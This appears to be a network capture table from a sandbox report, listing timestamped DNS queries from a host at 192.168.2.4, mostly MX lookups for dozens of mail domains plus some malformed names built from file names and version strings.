                                                                                                                                                                                                          Dec 4, 2023 13:00:00.114988089 CET6107553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.153956890 CET53610741.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.211914062 CET53610751.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.568422079 CET6107653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.630245924 CET6107753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.692828894 CET6107853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET53610761.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET53610771.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.742481947 CET6240853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.756691933 CET6240953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET53610781.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET53624091.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.912470102 CET53624081.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.005546093 CET6241053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.103354931 CET53624101.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.194788933 CET6241153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.292927027 CET53624111.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.380794048 CET6241253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.477243900 CET53624121.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.598905087 CET6241353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.696531057 CET53624131.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.756159067 CET6241453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.855206013 CET53624141.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.959352016 CET6241553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.056210041 CET53624151.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.149635077 CET6241653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.246150017 CET53624161.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.271274090 CET6241753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.334467888 CET6241853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.367964029 CET53624171.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.435425997 CET53624181.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.460341930 CET6241953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.557687998 CET53624191.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.584614038 CET6242053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.682271004 CET53624201.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.709462881 CET6242153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.771472931 CET6242253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.808274984 CET53624211.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.871501923 CET53624221.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.262166023 CET6242353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.318734884 CET6242453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET53624231.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.394731998 CET6242553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.443315983 CET53624241.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET53624251.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.599760056 CET5279953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.633389950 CET5280053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET53528001.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.978374958 CET53527991.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.818461895 CET5280153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.916292906 CET53528011.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.005812883 CET5280253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.102771997 CET53528021.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.192451000 CET5280353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.289403915 CET53528031.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.381217003 CET5280453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.479007959 CET53528041.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.568037033 CET5280553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.664668083 CET53528051.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.755254984 CET5280653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.852395058 CET53528061.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.208739042 CET5280753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.270823002 CET5280853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.404135942 CET5280953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.429430008 CET53528081.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET53528071.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.435187101 CET4979053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.500766993 CET53528091.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.521423101 CET4979153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET53497901.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.583688974 CET4979253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.619131088 CET53497911.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.680430889 CET53497921.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.709330082 CET4979353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.805989027 CET53497931.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.833626986 CET4979453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.960551023 CET4979553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.002531052 CET53497941.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.022763968 CET4979653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.058168888 CET53497951.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.120316029 CET53497961.1.1.1192.168.2.4
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.617208004 CET192.168.2.41.1.1.10x11dfStandard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.733052015 CET192.168.2.41.1.1.10xcf95Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.199285984 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.310018063 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.349865913 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.438976049 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.474900007 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.532509089 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.583698034 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.646394968 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.721318960 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.792948008 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.855591059 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.917095900 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.992125988 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.060656071 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.116363049 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.162630081 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.233717918 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.298243046 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.356503010 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.416532993 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.512583017 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.551721096 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.599066019 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.666831970 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.726443052 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.784470081 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.845383883 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.916975975 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.973804951 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.023700953 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.086271048 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.148869038 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.223227978 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.278407097 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.341114044 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.404840946 CET192.168.2.41.1.1.10x11dfStandard query (0)3x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.480418921 CET192.168.2.41.1.1.10x11dfStandard query (0)2x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.527740002 CET192.168.2.41.1.1.10x11dfStandard query (0)4x.pngMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.834614038 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.905287027 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.944775105 CET192.168.2.41.1.1.10x4c8cStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.960414886 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.043661118 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:36.603219032 CET192.168.2.41.1.1.10x11dfStandard query (0)z00false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.465971947 CET192.168.2.41.1.1.10x11dfStandard query (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.510313988 CET192.168.2.41.1.1.10x11dfStandard query (0)netcom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.584434032 CET192.168.2.41.1.1.10xbcbbStandard query (0)pb-mx22.pobox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.622838974 CET192.168.2.41.1.1.10x11dfStandard query (0)northcoast.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.622878075 CET192.168.2.41.1.1.10x3f1Standard query (0)mx01.earthlink-vadesecure.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.740166903 CET192.168.2.41.1.1.10x3565Standard query (0)mxa-00377f01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.924747944 CET192.168.2.41.1.1.10x11dfStandard query (0)onlineconnections.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.207446098 CET192.168.2.41.1.1.10x307cStandard query (0)onlineconnections.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.119013071 CET192.168.2.41.1.1.10x11dfStandard query (0)cl.cam.ac.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.178853035 CET192.168.2.41.1.1.10x11dfStandard query (0)src.dec.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.283826113 CET192.168.2.41.1.1.10x11dfStandard query (0)theriver.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.302917957 CET192.168.2.41.1.1.10xbb23Standard query (0)mx.cam.ac.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.305835009 CET192.168.2.41.1.1.10x11dfStandard query (0)bryson.demon.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.494678974 CET192.168.2.41.1.1.10xaf88Standard query (0)ismtp.sitestar.everyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.882945061 CET192.168.2.41.1.1.10x11dfStandard query (0)openoffice.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.988212109 CET192.168.2.41.1.1.10xdc9fStandard query (0)mx2-lw-eu.apache.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.709422112 CET192.168.2.41.1.1.10x11dfStandard query (0)gzip.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.712753057 CET192.168.2.41.1.1.10x11dfStandard query (0)alumni.caltech.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.773587942 CET192.168.2.41.1.1.10x11dfStandard query (0)nongnu.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.810802937 CET192.168.2.41.1.1.10x8e6bStandard query (0)alumni-caltech-edu.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.825021982 CET192.168.2.41.1.1.10xef33Standard query (0)gzip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.837090015 CET192.168.2.41.1.1.10x11dfStandard query (0)nongnu.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.886151075 CET192.168.2.41.1.1.10x3aa4Standard query (0)eggs.gnu.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.670665979 CET192.168.2.41.1.1.10x11dfStandard query (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.785085917 CET192.168.2.41.1.1.10x24d7Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.148745060 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.210634947 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.271567106 CET192.168.2.41.1.1.10xc1dfStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.280262947 CET192.168.2.41.1.1.10x11dfStandard query (0)outlook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.337029934 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.376770973 CET192.168.2.41.1.1.10xde3aStandard query (0)outlook-com.olc.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.297982931 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.547020912 CET192.168.2.41.1.1.10x11dfStandard query (0)2.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.731152058 CET192.168.2.41.1.1.10x11dfStandard query (0)4.2.1MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.801286936 CET192.168.2.41.1.1.10x11dfStandard query (0)1.1.49-custom.16MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.857830048 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.917257071 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.988451004 CET192.168.2.41.1.1.10x11dfStandard query (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.042936087 CET192.168.2.41.1.1.10x11dfStandard query (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.890754938 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.073013067 CET192.168.2.41.1.1.10x11dfStandard query (0)8.9.15MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.193279028 CET192.168.2.41.1.1.10x11dfStandard query (0)8.110.4MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.361696005 CET192.168.2.41.1.1.10x11dfStandard query (0)2.2.11MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.512841940 CET192.168.2.41.1.1.10x11dfStandard query (0)2.6.33MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.700805902 CET192.168.2.41.1.1.10x11dfStandard query (0)3.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.957540035 CET192.168.2.41.1.1.10x11dfStandard query (0)3.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.146372080 CET192.168.2.41.1.1.10x11dfStandard query (0)8.8.29MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.311306953 CET192.168.2.41.1.1.10x11dfStandard query (0)7.22.5MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.497687101 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.678091049 CET192.168.2.41.1.1.10x11dfStandard query (0)2.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.832895994 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.986820936 CET192.168.2.41.1.1.10x11dfStandard query (0)3.3.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.120625973 CET192.168.2.41.1.1.10x11dfStandard query (0)4.0.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.291026115 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.433757067 CET192.168.2.41.1.1.10x11dfStandard query (0)0.23.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.490381956 CET192.168.2.41.1.1.10x11dfStandard query (0)2.0.12MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.580461025 CET192.168.2.41.1.1.10x11dfStandard query (0)2.0.12MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.616143942 CET192.168.2.41.1.1.10x11dfStandard query (0)1.0.5MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.682137012 CET192.168.2.41.1.1.10x11dfStandard query (0)1.0.5MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.744831085 CET192.168.2.41.1.1.10x11dfStandard query (0)0.11.10MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.805339098 CET192.168.2.41.1.1.10x11dfStandard query (0)0.11.10MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.865484953 CET192.168.2.41.1.1.10x11dfStandard query (0)15.7.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.932988882 CET192.168.2.41.1.1.10x11dfStandard query (0)15.7.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.056797028 CET192.168.2.41.1.1.10x11dfStandard query (0)4.2.1MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.114988089 CET192.168.2.41.1.1.10x11dfStandard query (0)2.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.568422079 CET192.168.2.41.1.1.10x11dfStandard query (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.630245924 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.692828894 CET192.168.2.41.1.1.10x11dfStandard query (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.742481947 CET192.168.2.41.1.1.10x4704Standard query (0)eforward1.registrar-servers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.756691933 CET192.168.2.41.1.1.10x11dfStandard query (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.005546093 CET192.168.2.41.1.1.10x11dfStandard query (0)8.5.22MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.194788933 CET192.168.2.41.1.1.10x11dfStandard query (0)3.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.380794048 CET192.168.2.41.1.1.10x11dfStandard query (0)3.1.74MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.598905087 CET192.168.2.41.1.1.10x11dfStandard query (0)7.2.9MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.756159067 CET192.168.2.41.1.1.10x11dfStandard query (0)8.2.11MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.959352016 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.149635077 CET192.168.2.41.1.1.10x11dfStandard query (0)2.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.271274090 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.334467888 CET192.168.2.41.1.1.10x11dfStandard query (0)3.3.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.460341930 CET192.168.2.41.1.1.10x11dfStandard query (0)4.0.0MX (Mail exchange)IN (0x0001)false
